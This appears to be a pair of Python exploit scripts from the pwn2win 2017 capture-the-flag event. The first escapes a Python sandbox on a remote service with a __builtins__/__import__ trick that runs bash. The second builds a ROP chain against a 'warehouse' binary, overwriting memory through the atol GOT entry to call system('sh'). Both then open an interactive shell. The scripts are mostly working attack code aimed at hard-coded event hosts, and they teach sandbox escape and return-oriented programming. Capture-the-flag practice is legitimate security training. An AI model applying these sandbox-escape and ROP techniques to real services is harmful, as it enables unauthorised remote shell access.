pwn2win 2017 exps
#!/usr/bin/env python
# coding=utf8
from pwn import remote
# pwn2win 2017 -- scripted interaction with one of the event's remote services.
# The host/port are hard-coded to the 2017 CTF infrastructure and are not
# expected to be live; the lines sent are specific to that service and are
# reproduced exactly as the author left them.
p = remote('200.136.213.114', '4000')
# Fixed input sequence for the service. What the service does with each line
# cannot be told from this script alone.
# '\D' is not a recognised escape, so the two characters backslash and D are
# sent literally (Python 2 keeps unknown escapes unchanged).
p.sendline('\D')
p.sendline('Revoke')
p.sendline('O\tpen')
p.sendline('gen eval(Option())')
p.sendline("re.__builtins__['__import__']('posix').system('bash')")
# Drain whatever the service has already written (waiting at most 2 s), then
# hand the open session over to the user.
p.clean(timeout=2)
p.interactive()
#!/usr/bin/env python
# coding=utf8
from pwn import u32, p32, remote
from roputils import ROP
# Gadget and symbol lookups are taken from the challenge binary and the libc
# that shipped with it; both paths are relative, so the files must sit in the
# working directory when the script runs.
rop = ROP('./warehouse')
libc = ROP('./libc.so.6')
# Hard-coded address of the 2017 event service; not expected to be live.
p = remote('200.136.213.83', 8888)
def sendlist(*args):
    """Send every argument to the remote as its own line, after str() conversion.

    Uses the module-level connection ``p``; returns nothing.
    """
    for line in map(str, args):
        p.sendline(line)
def sendbuf(base, buf):
    """Send ``buf`` to the remote as little-endian 32-bit words.

    Word ``i`` of ``buf`` is sent as the pair ``(base + i, value)`` through
    ``sendlist``. Only whole 4-byte chunks are sent; a trailing partial chunk
    is dropped (``/`` is Python 2 integer division here).
    """
    n_words = len(buf) / 4
    for idx in range(n_words):
        chunk = buf[4 * idx:4 * idx + 4]
        sendlist(base + idx, u32(chunk))
# gadgets
# NOTE: every address below is specific to the challenge's './warehouse' build
# and its bundled libc; none of them is meaningful for any other binary.
pop_eax_ret = 0x08048539
pop_ebx_ret = 0x0804837d
add_eax_ebx_ret = 0x08048537 # *lucky*
call_eax = 0x08048463
atol_got = 0x8049910
store_func = 0x80484FB
# safe WA memory address in .dynamic
safe_to_write = 0x80498bc
# distance between two libc symbols; this value is build-specific, which is
# why the task's own ./libc.so.6 is loaded above
system_off_to_atol = libc.addr('system') - libc.addr('atol')
# store_func
# pop
# pop
# pop
# ret
payload = rop.call(store_func, safe_to_write, 0, u32('sh'.ljust(4, '\x00')))
# pop eax; ret
# pop ebx; ret
# add eax, dword ptr [eax + ebx*2] ; ret
# call eax
# The `/ 2` below is Python 2 integer division; the whole script is Python 2
# (str literals are passed straight to u32/p32, and sendbuf relies on
# `len(buf)/4` being an int).
payload += p32(pop_eax_ret) + p32(system_off_to_atol) + \
p32(pop_ebx_ret) + p32((atol_got - system_off_to_atol) / 2) + \
p32(add_eax_ebx_ret) + \
p32(call_eax) + p32(safe_to_write)
# Deliver the payload word by word through sendbuf, then the final '.' line
# the author used; drain pending output briefly and hand over the session.
sendbuf(72, payload)
p.sendline('.')
p.clean(timeout=0.5)
p.interactive()